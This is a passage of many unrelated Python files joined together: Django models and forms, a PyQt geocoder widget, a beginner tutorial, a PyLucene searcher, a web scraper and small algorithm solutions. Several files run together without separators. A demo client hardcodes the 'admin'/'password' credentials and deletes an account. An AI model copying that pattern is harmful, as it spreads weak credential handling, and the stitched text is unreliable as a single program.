                    "format": "json"}
                response = requests.get(geocoder_api_server, params=geocoder_params)
                if not response:
                    pass
                json_response = response.json()
                response_new = json_response["response"]["GeoObjectCollection"]["featureMember"][0]["GeoObject"]
                address = response_new["metaDataProperty"]["GeocoderMetaData"]["text"]
                self.address.setText(address)
            if event.button() == Qt.RightButton:
                pass
        except Exception as e:
            # best-effort: clicks outside the map / bad responses are ignored
            print(e)
if __name__ == '__main__':
    # Create the application, show the main window, run the Qt event loop.
    app = QApplication(sys.argv)
    ex = MyWidget()
    ex.show()
    sys.exit(app.exec_())
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    """Add the required `photo` image field to Athlete.

    `default=1` is only used to back-fill existing rows during this
    migration; `preserve_default=False` removes the default afterwards.
    """

    dependencies = [
        ('swimming', '0005_auto_20150329_1702'),
    ]

    operations = [
        migrations.AddField(
            model_name='athlete',
            name='photo',
            field=models.ImageField(default=1, upload_to=b''),
            preserve_default=False,
        ),
    ]
|
# --- basics: printing and variables ---
print("Hello World")
diva = "jinyc76"
print(diva)
# --- string literals: raw and multi-line strings ---
str_raw = r"'\r\n\t\s\""
print(str_raw)
str_multi = """
this is multi\
line\
message
line end add \\ \
shows one line
"""
print(str_multi)
str_multi2 = '''this shows also \
multi line
with quot
'''
print(str_multi2)
# --- string operators and methods ---
str_exe1 = "this is execution "
str_exe2 = "string line"
print(str_exe1*3)
print(str_exe1+str_exe2)
print(dir(str_exe1))
print("Capitalize : ",str_exe2.capitalize())
# NOTE(review): the message says 'g' but the code checks endswith("e").
print("is 'first sound' end with g : ",str_exe2.endswith("e"))
print("join string with 'str_exe2' str : ", str_exe2.join(["multiline","joinline","resultline"]))
# --- lists, indexing, slicing ---
list1 = [1,2,3]
list2 = ["a","b","c"]
list3 = list("list element")
list4 = list(list1+list2)
print(list1)
print(list2)
print(list3)
print(list4)
print(list4[2])
print("negative index reverse list3[-1] , list3[-5] : " , list3[-1] , "," , list3[-5])
print(list3*2)
print("list4 to 3th index element list4[:3] : " , list4[:3])
print("list4 from 4th index element list4[4:] : " , list4[4:])
print("list4 from every 1th index element list4[::1] : " , list4[::1])
print("list4[start:stop:step] list4[0:5:2] : ", list4[0:5:2])
print("string like list str_exe1[3:15:3] : ", str_exe1[3:15:3])
# --- conditionals ---
if True :
    print("Yes True")
if False :
    print("No False")
if False :
    print("No False")
else:
    print("No False Else Place")
ex_num1 = 11
if ex_num1 < 10 :
    print("less than 10")
elif ex_num1 >= 10 :
    print("more than 10")
else:
    print("not number")
print(not True)
print(not False)
# --- membership tests on tuples and dicts ---
t1 = (1,2,3,4,5)
print(3 in t1)
print(7 in t1)
d1 = {"one":1 , "two":2 , "three":3}
print(2 in d1.values())
w1 = d1["three"]
print(w1)
# --- loops: while, for over lists/dicts/ranges, break ---
while w1 > 0:
    print("w1 is : ",w1)
    w1 -=1
for i in range(10):
    print(i)
ex_arr = ["aaa" , "bbb" , "ccc"]
for name in ex_arr:
    print(name)
ex_d1 = {"name":"test","version":3,"company":"mycompany","like number":7}
for title in ex_d1:
    print(title," : ",ex_d1[title])
for k in range(1,30,3):
    print(k)
for k in range(10):
    if k == 3:
        print("find ",k," and end")
        break
    else:
        print(k)
def hello(world):
    """Print a greeting for *world*."""
    print("hello {}".format(world))

to = "jinyc"
hello(to)
def hello(world):
    """Return (rather than print) the greeting for *world*."""
    return "hello" + str(world)

retVal = hello("test123")
print(retVal)
def func(number):
    """Demonstrate a nested (inner) function definition."""
    def _show(value):
        print(value)
    print("in_func")
    _show(number + 1)

func(1)
def count_length(word: str, num: int) -> int:
    """Return the length of *word* multiplied by *num*."""
    return num * len(word)

print(count_length("jinyc", 5))
class cls:
    # Minimal (empty) class definition example.
    pass
class Diva:
    """A named singer; `version` is shared by every instance."""

    version = "1.0"

    def __init__(self, name="diva"):
        self.name = name

    def song(self, title="song"):
        print("{} sing the {}".format(self.name, title))

    def medley(self):
        # Three songs back to back; the first uses the default title.
        for track in ("song", "second song", "third song"):
            self.song(track)
diva1 = Diva()
diva2 = Diva("aaa")
diva3 = Diva("111")
def print_diva(diva):
    # Show both the instance attribute (name) and class attribute (version).
    print("-----")
    print("name : ",diva.name)
    print("version : "+diva.version)
print_diva(diva1)
print_diva(diva2)
print_diva(diva3)
voice_diva = Diva("haha")
voice_diva.song()
voice_diva.song("world song")
voice_diva.medley()
# Calling the unbound method through the class, passing the instance.
Diva.song(voice_diva,"tell your song")
class Calculator:
    """Tiny demo class with a single utility method.

    BUGFIX: `adder` had no `self` parameter, so it only worked when called
    through the class (`Calculator.adder(3, 4)`) and raised TypeError from
    an instance. `@staticmethod` keeps the class-call working and makes
    instance calls work too.
    """

    @staticmethod
    def adder(a, b):
        print(a + b)

Calculator.adder(3,4)
class Heroes(Calculator):
    # Inherits adder() unchanged from Calculator.
    pass
Heroes.adder(1,2)
class Miku(Diva):
    """A Diva that is always named "miku" and can also dance."""

    def __init__(self, module="class uniform"):
        super().__init__("miku")
        self.module = module

    def dance(self):
        print("dancing")

miku = Miku()
print(miku.version)
|
__author__ = 'hodor'
import requests
import json
import constants
def UploadDemo():
    """Authenticate as 'evan' and upload lol.txt into files/lulz/ on the server."""
    # token auth: exchange username/password for an API token
    response = requests.post(constants.server_url + '/api-token-auth/', {'username': 'evan', 'password' : 'password'})
    token = response.json()['token']
    header = {}
    header['Authorization']= 'Token '+ token
    payload = {}
    payload['path']= 'files/lulz/'
    # NOTE(review): the file handle is never closed.
    files = {'file': open('/home/hodor/OneDir/OneDir/Server/Demo/lol.txt', 'rb')}
    response = requests.post(constants.server_url + '/UploadFile/', headers=header, files=files, data=payload)
    print response.content
def DeleteDemo():
    """Authenticate as 'evan' and delete the previously uploaded demo file."""
    response = requests.post(constants.server_url + '/api-token-auth/', {'username': 'evan', 'password' : 'password'})
    token = response.json()['token']
    header = {}
    header['Authorization']= 'Token '+ token
    response = requests.delete(constants.server_url + '/DeleteFile/evan/files/lulz/lol.txt', headers= header)
    return response
def DeleteUser():
    """Authenticate as 'admin' and delete the 'evan' account; returns the response."""
    response = requests.post(constants.server_url + '/api-token-auth/', {'username': 'admin', 'password' : 'password'})
    token = response.json()['token']
    header = {}
    header['Authorization']= 'Token '+ token
    response = requests.delete(constants.server_url + '/DeleteUser/evan', headers= header)
    return response
if __name__ == '__main__':
    # Demo driver: upload a file, then remove the demo user.
    UploadDemo()
    #deleteTest = DeleteDemo()
    #print deleteTest.content
    response = DeleteUser()
    print response.content
import itertools
import pygame
# Custom modules
import colors as c
# Maps config color names to RGB constants from the colors module.
COLORDICT = {
    'white': c.WHITE
}
# GUI parameters
BACKGROUND = c.BLACK
FPS = 60
FONTNAME = 'Arial'
FONTSIZE = 40
CAPTION = 'Reaction time experiment'
SCREEN_SIZE = (800, 600)
# Session parameters
DEFAULT_NAME = 'A_girl_has_no_name'
DEFAULT_SESSION = 'Infinity'
DEFAULT_RATE = 3.0
DEFAULT_WRITE = True
# Experimental set-up
# Possible text stimuli, keyed by phase name.
WORDS = {
    'A': [u'', u'A'],
    'B': ['A', 'B'],
    'C': ['A', 'B']
}
# Possible colors of text stimuli
COLORS = ['white']
# Possible phases; cycles A -> B -> C -> A ...
PHASES = itertools.cycle(['A', 'B', 'C'])
# Response options: per phase, each button's hit-box, state, the stimulus
# it is reinforced for, and its state-dependent colors.
BUTTONS = {
    'A': {
        'first': {
            'bounds': pygame.Rect(350, 450, 100, 100),
            'state': 'normal',
            'reinforced_if': 'A',
            'color_dict': {
                'normal': c.RED1,
                'hover': c.RED2,
                'pressed': c.RED3,
            }
        }
    },
    'B': {
        'first': {
            'bounds': pygame.Rect(250, 450, 100, 100),
            'state': 'normal',
            'reinforced_if': 'A',
            'color_dict': {
                'normal': c.RED1,
                'hover': c.RED2,
                'pressed': c.RED3,
            }
        },
        'second': {
            'bounds': pygame.Rect(450, 450, 100, 100),
            'state': 'normal',
            'reinforced_if': 'B',
            'color_dict': {
                'normal': c.GREEN1,
                'hover': c.GREEN2,
                'pressed': c.GREEN3,
            }
        }
    },
    'C': {
        'first': {
            'bounds': pygame.Rect(350, 450, 100, 100),
            'state': 'normal',
            'reinforced_if': 'A',
            'color_dict': {
                'normal': c.RED1,
                'hover': c.RED2,
                'pressed': c.RED3,
            }
        }
    }
}
# Stimuli presented (text, color name, screen position)
STIMULI = {
    'first': {
        'text': u'',
        'color': 'white',
        'pos': (400, 300)
    }
}
# Score counter
SCORE = {
    'pos': (100, 100),
    'color': 'white'
}
# Custom event to trigger changes in stimuli
CHANGE_STIMULI = pygame.USEREVENT + 1
# List to store collected data; first row is the CSV header.
DATA = [['time', 'responses', 'score', 'phase_name', 'phase_id', 'rate']]
"""
EnsembleStat: Using Python Embedding
=============================================================================
met_tool_wrapper/EnsembleStat/EnsembleStat_python
_embedding.conf
"""
############################################################################
# Scientific Objective
# --------------------
#
# To provide useful statistical information on the relationship between
# observation data (in both grid and point formats) to an ensemble forecast.
# These values can be used to help correct ensemble member deviations from observed values.
##############################################################################
# Datasets
# --------
#
# | **Forecast:** Dummy text files found in the MET shared directory
# | **Observation:** Dummy text files found in the MET shared directory
#
# | **Location:** All of the input data required for this use case can be found in the met_test sample data tarball. Click here to go to the METplus releases page and download the sample data for the appropriate release: https://github.com/dtcenter/METplus/releases
# | The tarball should be unpacked into the directory that you will set the value of INPUT_BASE. See `Running METplus`_ section for more information.
# |
#
##############################################################################
# METplus Components
# ------------------
#
# This use case utilizes the METplus EnsembleStat wrapper to read in files using Python Embedding to demonstrate how to read in data this way.
#
##############################################################################
# METplus Workflow
# ----------------
#
# EnsembleStat is the only tool called in this example. It processes a single run time with two ensemble members. The input data are simple text files with no timing information, so the list of ensembles simply duplicates the same file multiple times to demonstrate how data is read in via Python Embedding.
#
##############################################################################
# METplus Configuration
# ---------------------
#
# METplus first loads all of the configuration files found in parm/metplus_config,
# then it loads any configuration files passed to METplus via the command line
# with the -c option, i.e. -c parm/use_cases/met_tool_wrapper/EnsembleStat/EnsembleStat_python_embedding.conf
#
# .. highlight:: bash
# .. literalinclude:: ../../../../parm/use_cases/met_tool_wrapper/EnsembleStat/EnsembleStat_python_embedding.conf
##############################################################################
# MET Configuration
# -----------------
#
#
# METplus sets environment variables based on user settings in the METplus configuration file.
# See :ref:`How METplus controls MET config file settings<metplus-control-met>` for more details.
#
# **YOU SHOULD NOT SET ANY OF THESE ENVIRONMENT VARIABLES YOURSELF! THEY WILL BE OVERWRITTEN BY METPLUS WHEN IT CALLS THE MET TOOLS!**
#
# If there is a setting in the MET configuration file that is currently not supported by METplus you'd like to control, please refer to:
# :ref:`Overriding Unsupported MET config file settings<met-config-overrides>`
#
# .. note:: See the :ref:`EnsembleStat MET Configuration<ens-stat-met-conf>` section of the User's Guide for more information on the environment variables used in the file below:
#
# .. highlight:: bash
# .. literalinclude:: ../../../../parm/met_config/EnsembleStatConfig_wrapped
##############################################################################
# Python Embedding
# ----------------
#
# This use case calls a Python script to read the input data.
# The Python script is stored in the MET repository: /path/to/MET/installation/share/met/python/read_ascii_numpy.py
#
# `read_ascii_numpy.py <https://github.com/dtcenter/MET/blob/develop/scripts/python/read_ascii_numpy.py>`_
##############################################################################
# Running METplus
# ---------------
#
# It is recommended to run this use case by:
#
# Passing in EnsembleStat_python_embedding.conf then a user-specific system configuration file::
#
# run_metplus.py -c /path/to/METplus/parm/use_cases/met_tool_wrapper/EnsembleStat/EnsembleStat_python_embedding.conf -c /path/to/user_system.conf
#
# The following METplus configuration variables must be set correctly to run this example.:
#
# * **INPUT_BASE** - Path to directory where sample data tarballs are unpacked (See Datasets section to obtain tarballs).
# * **OUTPUT_BASE** - Path where METplus output will be written. This must be in a location where you have write permissions
# * **MET_INSTALL_DIR** - Path to location where MET is installed locally
#
# Example User Configuration File::
#
# [dir]
# INPUT_BASE = /path/to/sample/input/data
# OUTPUT_BASE = /path/to/output/dir
# MET_INSTALL_DIR = /path/to/met-X.Y
#
# **NOTE:** All of these items must be found under the [dir] section.
#
##############################################################################
# Expected Output
# ---------------
#
# A successful run will output the following both to the screen and to the logfile::
#
# INFO: METplus has successfully finished running.
#
# Refer to the value set for **OUTPUT_BASE** to find where the output data was generated.
# Output for this use case will be found in met_tool_wrapper/EnsembleStat/ens_python_embedding (relative to **OUTPUT_BASE**)
# and will contain the following files:
#
# * ensemble_stat_PYTHON_20050807_120000V_ecnt.txt
# * ensemble_stat_PYTHON_20050807_120000V_ens.nc
# * ensemble_stat_PYTHON_20050807_120000V_orank.nc
# * ensemble_stat_PYTHON_20050807_120000V_phist.txt
# * ensemble_stat_PYTHON_20050807_120000V_relp.txt
# * ensemble_stat_PYTHON_20050807_120000V_rhist.txt
# * ensemble_stat_PYTHON_20050807_120000V_ssvar.txt
# * ensemble_stat_PYTHON_20050807_120000V.stat
#
##############################################################################
# Keywords
# --------
#
# .. note::
#
# * EnsembleStatToolUseCase
# * PythonEmbeddingFileUseCase
# * EnsembleAppUseCase
# * ProbabilityGenerationAppUseCase
#
# Navigate to the :ref:`quick-search` page to discover other similar use cases.
#
#
#
# sphinx_gallery_thumbnail_path = '_static/met_tool_wrapper-EnsembleStat.png'
#
|
from django import forms
from .models import TenantDetails
class DateInput(forms.DateInput):
    # Render as an HTML5 date picker instead of the default text input.
    input_type = 'date'
class TenantForm(forms.ModelForm):
    """ModelForm for TenantDetails with Bootstrap styling.

    Every widget gets the 'form-control' CSS class; most fields also get
    the HTML `required` attribute (client-side validation only).
    """

    # Fields that must NOT carry the HTML `required` attribute.
    # (adhar_img / pan_img were deliberately left optional: their required
    # lines were commented out in the original.)
    _NOT_REQUIRED = (
        'last_name',
        'adhar_img',
        'pan_img',
        'advance_amt',
        'status',
        'vacate_date',
    )

    class Meta:
        model = TenantDetails
        fields = [
            'first_name',
            'last_name',
            'pg_name',
            'phone_number',
            'email',
            'address',
            'adhar_img',
            'pan_img',
            'room_no',
            'occupatin',  # NOTE(review): typo for 'occupation' -- must match the model field name
            'rent',
            'food_required',
            'food_amt',
            'advance_amt',
            'joining_date',
            'status',
            'vacate_date',
        ]
        widgets = {'joining_date': DateInput(), 'vacate_date': DateInput()}

    def __init__(self, *args, **kwargs):
        super(TenantForm, self).__init__(*args, **kwargs)
        # Replaces the long hand-written per-field block: style every widget
        # and flag the required ones.
        for name, field in self.fields.items():
            field.widget.attrs.update({'class': 'form-control'})
            if name not in self._NOT_REQUIRED:
                field.widget.attrs['required'] = True
import sys
import math
def main(argv):
    """Sieve of Eratosthenes up to int(argv[0]); print counts and the primes.

    Python 2 script (print statements, xrange).
    """
    maximum = int(argv[0])
    markers = [True] * (maximum + 1)
    for i in xrange(2, int(math.sqrt(maximum)) + 1):
        if markers[i]:
            # i is prime: mark every multiple from i*i upward as composite
            for j in xrange(i ** 2, maximum + 1, i):
                markers[j] = False
    primes = [p for p in xrange(2, maximum + 1) if markers[p]]
    count = len(primes)
    print
    print ' Total primes between 2 and %s: %s' % (maximum, count)
    print 'Total composites between 2 and %s: %s' % (maximum, maximum - 1 - count)
    print
    # 10 primes per line, right-aligned in 4-character columns
    print '\n'.join([', '.join(['%4s' % p for p in primes[k:k + 10]]) for k in xrange(0, len(primes), 10)])
    print

if __name__ == "__main__":
    main(sys.argv[1:])
|
from django.db import models
from django.contrib.auth.models import User
from django_extensions.db.fields import CreationDateTimeField, ModificationDateTimeField
from deptx.helpers import generateUUID
#from mop.trustmanager import tm_getTotalTrust, tm_getCurrentTrust, tm_getCurrentTrustCredit, tm_getCurrentClearance
#TODO move Player into CRON
#TODO move Cron and Mop into appropriate apps
class Player(models.Model):
    """Real-world participant behind the Cron/Mop game accounts."""
    firstName = models.CharField(max_length=50)
    lastName = models.CharField(max_length=50)
    email = models.EmailField()
    createdAt = CreationDateTimeField()
    modifiedAt = ModificationDateTimeField()

    def __unicode__(self):
        return self.firstName + " " + self.lastName
class Cron(models.Model):
    """A player's primary account; must be activated via activationCode."""
    player = models.OneToOneField(Player)
    user = models.OneToOneField(User)
    activated = models.BooleanField(default=False)
    # emailed to the player; a fresh UUID per account
    activationCode = models.CharField(max_length=36, default=generateUUID)
    createdAt = CreationDateTimeField()
    modifiedAt = ModificationDateTimeField()

    def __unicode__(self):
        return self.user.username + " (" + self.player.firstName + " " + self.player.lastName + ")"
class Mop(models.Model):
    """A player's in-game character, with profile attributes and trust state.

    A Player may own several Mops (ForeignKey), each tied to its own
    Django auth User.
    """

    # --- enumerated profile attributes ---
    GENDER_MALE = 0
    GENDER_FEMALE = 1
    GENDER_OTHER = 2
    GENDER_CHOICES = (
        (GENDER_MALE, 'male'),
        (GENDER_FEMALE, 'female'),
        (GENDER_OTHER, 'other'),
    )
    MARITAL_SINGLE = 0
    MARITAL_MARRIED = 1
    MARITAL_DIVORCED = 2
    MARITAL_WIDOWED = 3
    MARITAL_CHOICES = (
        (MARITAL_SINGLE, 'single'),
        (MARITAL_MARRIED, 'married'),
        (MARITAL_DIVORCED, 'divorced'),
        (MARITAL_WIDOWED, 'widowed'),
    )
    HAIR_BLONDE = 0
    HAIR_BROWN = 1
    HAIR_BLACK = 2
    HAIR_GREY = 3
    HAIR_WHITE = 4
    HAIR_RED = 5
    HAIR_AUBURN = 6
    HAIR_CHESTNUT = 7
    HAIR_CHOICES = (
        (HAIR_BLONDE, 'blonde'),
        (HAIR_BROWN, 'brown'),
        (HAIR_BLACK, 'black'),
        (HAIR_GREY, 'grey'),
        (HAIR_WHITE, 'white'),
        (HAIR_RED, 'red'),
        (HAIR_AUBURN, 'auburn'),
        (HAIR_CHESTNUT, 'chestnut'),
    )
    EYE_BLUE = 0
    EYE_BROWN = 1
    EYE_GREEN = 2
    EYE_GREY = 3
    EYE_AMBER = 4
    EYE_HAZEL = 5
    EYE_RED = 6
    EYE_VIOLET = 7
    EYES_CHOICES = (
        (EYE_BLUE, 'blue'),
        (EYE_BROWN, 'brown'),
        (EYE_GREEN, 'green'),
        (EYE_GREY, 'grey'),
        (EYE_AMBER, 'amber'),
        (EYE_HAZEL, 'hazel'),
        (EYE_RED, 'red'),
        (EYE_VIOLET, 'violet'),
    )
    # clearance levels; labels are the in-game color names
    CLEARANCE_0_NONE = -1
    CLEARANCE_1_LOW = 0
    CLEARANCE_2_MEDIUM = 1
    CLEARANCE_3_HIGH = 2
    CHOICES_CLEARANCE = (
        (CLEARANCE_0_NONE, 'NONE'),
        (CLEARANCE_1_LOW, 'BLUE'),
        (CLEARANCE_2_MEDIUM, 'RED'),
        (CLEARANCE_3_HIGH, 'ULTRAVIOLET'),
    )

    # --- relations and bookkeeping ---
    player = models.ForeignKey(Player)
    user = models.OneToOneField(User)
    active = models.BooleanField(default=True)
    createdAt = CreationDateTimeField()
    modifiedAt = ModificationDateTimeField()

    # --- character profile ---
    firstname = models.CharField(max_length=100)
    lastname = models.CharField(max_length=100)
    dob = models.DateField()
    gender = models.IntegerField(choices=GENDER_CHOICES)
    weight = models.IntegerField()
    height = models.IntegerField()
    marital = models.IntegerField(choices=MARITAL_CHOICES)
    hair = models.IntegerField(choices=HAIR_CHOICES)
    eyes = models.IntegerField(choices=EYES_CHOICES)
    serial = models.CharField(max_length=36, default=generateUUID)

    # --- trust/clearance state (see the trustmanager helpers below) ---
    totalTrust = models.IntegerField(default=0)
    trust = models.IntegerField(default=0)
    credit = models.IntegerField(default=0)
    clearance = models.IntegerField(choices=CHOICES_CLEARANCE, default=CLEARANCE_1_LOW)

#    def getTotalTrust(self):
#        return tm_getTotalTrust(self)
#
#    def getCurrentTrust(self):
#        return tm_getCurrentTrust(self)
#
#    def getCurrentTrustCredit(self):
#        return tm_getCurrentTrustCredit(self)
#
#    def getCurrentClearance(self):
#        return tm_getCurrentClearance(self)

    def __unicode__(self):
        return "%s - cron: %s - active: %s" % (self.user.username, self.player.cron.user.username, self.active)
|
import json
if __name__ == "__main__":
    # Merge the Uniswap and Sushiswap token lists into Python constant
    # definitions appended to tokens.py, skipping duplicate symbols.
    with open('uniswapDefaultList.txt', 'r') as uniswapDefaultList:
        uni = json.loads(uniswapDefaultList.read())
    with open('sushiswapTokenList.txt', 'r') as sushiswapTokenList:
        sushi = json.loads(sushiswapTokenList.read())
    lists = [uni, sushi]
    symbols = []
    with open('tokens.py', 'a') as dest:
        for l in lists:
            for token in l.get('tokens'):
                # BUGFIX: the original set a flag and `break`-ed here, which
                # aborted the ENTIRE remaining token list on the first
                # duplicate symbol; a duplicate should only skip that token.
                if token.get('symbol') in symbols:
                    continue
                token_desc = token.get('symbol') + " = {\n"
                token_desc += "\'symbol\': \'" + token.get('symbol') + "\',\n"
                token_desc += "\'name\': \'" + token.get('name') + "\',\n"
                token_desc += "\'address\': hex(" + token.get('address') + "),\n"
                token_desc += "\'cksum_address\': w3.toChecksumAddress(\'" + token.get('address') + "\'),\n"
                token_desc += "\'decimals\': " + str(token.get('decimals')) + ",\n"
                token_desc += "}\n"
                symbols.append(token.get('symbol'))
                dest.write(token_desc)
# Definition for singly-linked list.
# class ListNode(object):
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution(object):
    def swapPairs(self, head):
        """
        Swap every two adjacent nodes of a singly linked list in place.

        :type head: ListNode
        :rtype: ListNode
        """
        if head is None or head.next is None:
            return head
        # The second node becomes the new head.
        new_head = head.next
        prev = None
        first = head
        while first is not None and first.next is not None:
            second = first.next
            after = second.next
            # Reverse this pair and provisionally attach the remainder;
            # if the next pair swaps too, prev.next is patched below.
            second.next = first
            first.next = after
            if prev is not None:
                prev.next = second
            prev = first
            first = after
        return new_head
# Optimal approach:
# Similar to reversing a linked list: keep three pointers (previous, current
# and next node). The difference is that after swapping each pair, the
# pointers advance by a step of two.
|
#!/usr/bin/env python
import sys
import jieba
from stemming.porter2 import stem
from lucene import VERSION, initVM
from java.io import File, StringReader
from org.apache.lucene.index import DirectoryReader
from org.apache.lucene.analysis.core import SimpleAnalyzer
from org.apache.lucene.analysis.standard import StandardAnalyzer
from org.apache.lucene.analysis.cn import ChineseAnalyzer
from org.apache.lucene.search.highlight import Highlighter, \
SimpleFragmenter, QueryScorer, SimpleHTMLFormatter
from org.apache.lucene.store import SimpleFSDirectory
from org.apache.lucene.search import IndexSearcher
from org.apache.lucene.queryparser.classic import QueryParser
from org.apache.lucene.util import Version
class ArticleSearcher(object):
    """Thin wrapper around a PyLucene IndexSearcher for article queries.

    Python 2 module (print statements).
    """

    def __init__(self, store_dir):
        # Boot the JVM and open the index directory.
        initVM()
        directory = SimpleFSDirectory(File(store_dir))
        self.searcher = IndexSearcher(DirectoryReader.open(directory))
        print 'loaded index: %s' % store_dir
        # One analyzer per strategy; selected per-query in search_by().
        self.analyzer = {}
        self.analyzer['StandardAnalyzer'] = StandardAnalyzer(Version.LUCENE_CURRENT)
        self.analyzer['SimpleAnalyzer'] = SimpleAnalyzer(Version.LUCENE_CURRENT)
        self.analyzer['ChineseAnalyzer'] = ChineseAnalyzer(Version.LUCENE_CURRENT)

    def _set_store_dir(self, store_dir):
        # Swap the searcher over to a different index directory.
        self.searcher.close()
        directory = SimpleFSDirectory(File(store_dir))
        self.searcher = IndexSearcher(directory, True)
        print 'loaded index: %s' % store_dir

    def close(self):
        self.searcher.close()

    def search_by(self, **kwargs):
        """Search the index and return a list of result dicts.

        Keyword args:
            command    -- raw query string (required; '' returns None)
            field      -- index field to query
            query_type -- 'chi' segments with jieba; anything else Porter-stems
            num        -- maximum number of hits (default 50)
            attrs      -- stored fields copied into each result (default url/title)

        Content/title searches additionally get an 'abstract' key with
        highlighted snippets.
        """
        command = kwargs.get('command', '')
        if command == '':
            return None
        field = kwargs.get('field')
        query_type = kwargs.get('query_type', 'chi')
        if query_type == 'chi':
            # Chinese: segment with jieba so terms match the indexed tokens.
            if field in ['token_taglist', 'token_content', 'token_title', 'token_author']:
                command = ' '.join(jieba.cut_for_search(command))
            hlt_analyzer = self.analyzer['ChineseAnalyzer']
        else:
            # English: Porter-stem every word of the query.
            if field in ['token_content', 'token_title']:
                command = ' '.join(map(stem, command.split()))
            hlt_analyzer = self.analyzer['StandardAnalyzer']
        analyzer = self.analyzer['SimpleAnalyzer']
        num = kwargs.get('num', 50)
        attrs = kwargs.get('attrs', ['url', 'title'])
        print "[%s]\tSearching for '%s' in field '%s'" % (query_type, command, field)
        query = QueryParser(Version.LUCENE_CURRENT, field, analyzer).parse(command)
        if field in ['token_content', 'token_title']:
            # Build a highlighter over the raw 'content' field for snippets.
            getAbs = True
            query_for_highlight = QueryParser(Version.LUCENE_CURRENT, 'content', hlt_analyzer).parse(command)
            scorer = QueryScorer(query_for_highlight)
            formatter = SimpleHTMLFormatter("<strong>", "</strong>")
            # formatter = SimpleHTMLFormatter("<span class=\"highlight\">", "</span>")
            highlighter = Highlighter(formatter, scorer)
            fragmenter = SimpleFragmenter(20)
            highlighter.setTextFragmenter(fragmenter)
        else:
            getAbs = False
        scoreDocs = self.searcher.search(query, num).scoreDocs
        print "%s total matching documents." % len(scoreDocs)
        articles = []
        for scoreDoc in scoreDocs:
            doc = self.searcher.doc(scoreDoc.doc)
            article = {}
            for attr in attrs:
                article[attr] = doc.get(attr)
            if getAbs is True:
                content = doc.get('content')
                tokenStream = hlt_analyzer.tokenStream("content", StringReader(content))
                article['abstract'] = highlighter.getBestFragments(tokenStream, content, 3, "...")
            articles.append(article)
        return articles
if __name__ == '__main__':
    # Interactive query loop: read queries from stdin until an empty line.
    if len(sys.argv) < 2:
        print "Usage: SearchFiles <IndexPath>"
        sys.exit(-1)
    print 'lucene', VERSION
    searcher = ArticleSearcher(sys.argv[1])
    while True:
        command = raw_input("Query:")
        if command == '':
            break
        # NOTE(review): this prints article['abstract'], but searching
        # 'token_title' does not populate 'abstract' -- likely a KeyError
        # or None; confirm against search_by's attrs handling.
        for article in searcher.search_by(field='token_title', command=command, query_type='chi', num=100):
            print 'title: %s' % article['abstract']
|
# This script scrapes KBDI data from http://flame.fl-dof.com/cgi-bin/KbdiArchiveListing.py
# Specifically, it grabs all archived reports from that site and saves them as
# .csv files locally
from bs4 import BeautifulSoup
import argparse
import urllib2
import re
import string as str
import os
# Helper functions, which will be referred to below
def is_valid_row(elt):
    """Return True for <tr> elements that have more than five children."""
    if elt.name != "tr":
        return False
    return len(elt.contents) > 5
def get_text(column):
    """Return the text of the first <font> tag inside *column*, or "".

    *column* is a BeautifulSoup table-cell element.
    """
    node = column.find("font")
    # Use identity comparison with None (PEP 8) instead of `== None`.
    if node is None:
        return ""
    return node.find(string=True)
def get_filename(link):
    """Map a report URL/path to its local .csv filename.

    Takes the last path component and swaps the .html suffix for .csv.
    Uses str methods instead of the deprecated ``string`` module functions
    (``string.split``/``string.replace`` were removed in Python 3).
    """
    report_html_file = link.split("/")[-1]
    return report_html_file.replace(".html", ".csv")
def is_within_date_range(link, start_date, end_date):
    """Return True when *link*'s embedded report date lies in [start_date, end_date].

    *link* is a dict-like anchor element whose 'href' looks like
    ``.../kbdi-report-YYYYMMDD.html``; the date is normalised to
    ``YYYY-MM-DD`` so a lexicographic compare matches chronological order.
    A ``None`` bound means that side is unbounded.
    Rewritten with str methods: the Python-2-only ``string`` module helpers
    (and their reversed ``str.join(list, sep)`` argument order) were removed
    in Python 3.
    """
    href = link['href']
    report_html_file = href.split("/")[-1]
    report_base_name = report_html_file.replace(".html", "")
    # e.g. "kbdi-report-20180615" -> "20180615"
    date_digits = report_base_name.split("-")[2]
    year = date_digits[0:4]
    month = date_digits[4:6]
    day = date_digits[6:8]
    date_str = "-".join([year, month, day])
    within_range_start = (start_date is None) or (date_str >= start_date)
    within_range_end = (end_date is None) or (date_str <= end_date)
    return within_range_start and within_range_end
# Parse arguments (optional inclusive date bounds, as YYYY-MM-DD strings).
parser = argparse.ArgumentParser()
parser.add_argument("--start_date", help = "date of first report to download data for")
parser.add_argument("--end_date", help = "date of last report to download data for")
args = parser.parse_args()
# Initialize output directory
data_dir = "data/kbdi/"
if not os.path.exists(data_dir):
    os.makedirs(data_dir)
# Initialize scraper (Python 2: urllib2).
domain = "http://flame.fl-dof.com/"
start_url = domain + "/cgi-bin/KbdiArchiveListing.py"
page = urllib2.urlopen(start_url)
page_reader = BeautifulSoup(page.read(), "lxml")
# For each report, scrape the contents and write to a .csv
links = page_reader.find_all("a", href = re.compile("archive/kbdi-report-20"))
for link in links:
    # if the report is not in the specified date range, skip it
    if not is_within_date_range(link, args.start_date, args.end_date):
        continue
    report_href = link['href']
    report_filename = get_filename(report_href)
    output_filename = data_dir + report_filename
    report_url = domain + report_href
    report_reader = BeautifulSoup(urllib2.urlopen(report_url), "lxml")
    output_file = open(output_filename, 'w')
    print("Now writing to " + report_filename + "...")
    # Keep only table rows with enough cells (see is_valid_row).
    table_rows = report_reader.find_all(is_valid_row)
    for row in table_rows:
        columns = row.find_all(["th", "td"])
        column_texts = []
        for column in columns:
            text = get_text(column)
            # Treat non-breaking-space-only cells as empty.
            if text == u'\xa0' or text == None:
                text = ""
            column_texts.append(text)
        # NOTE: `str` is the `string` module here (see `import string as str`);
        # str.join(list, sep) is the Python-2 module-function argument order.
        output = str.join(column_texts, ",") + "\n"
        output_file.write(output)
    output_file.close()
print "Done."
|
# Function that draws a graph; takes a list of lists.
# Requires the Graphviz 2.38 library to be installed and .../Graphviz 2.38/bin
# added to the environment variables (PATH).
from graphviz import Digraph
import os
def draw_graph(data):
    """Render a program-dependence diagram and open it in the viewer.

    Each entry of *data* is a 5-element sequence:
    (source name, source id, target name, target id, edge label).
    """
    diagram = Digraph(comment='Program Dependences Diagram')
    diagram.attr('node', shape='box', style='filled', fillcolor='lightblue')
    for entry in data:
        head_label = entry[0] + "\n" + str(entry[1])
        tail_label = entry[2] + "\n" + str(entry[3])
        diagram.edge(head_label, tail_label, str(entry[4]))
    diagram.attr(fontsize='20')
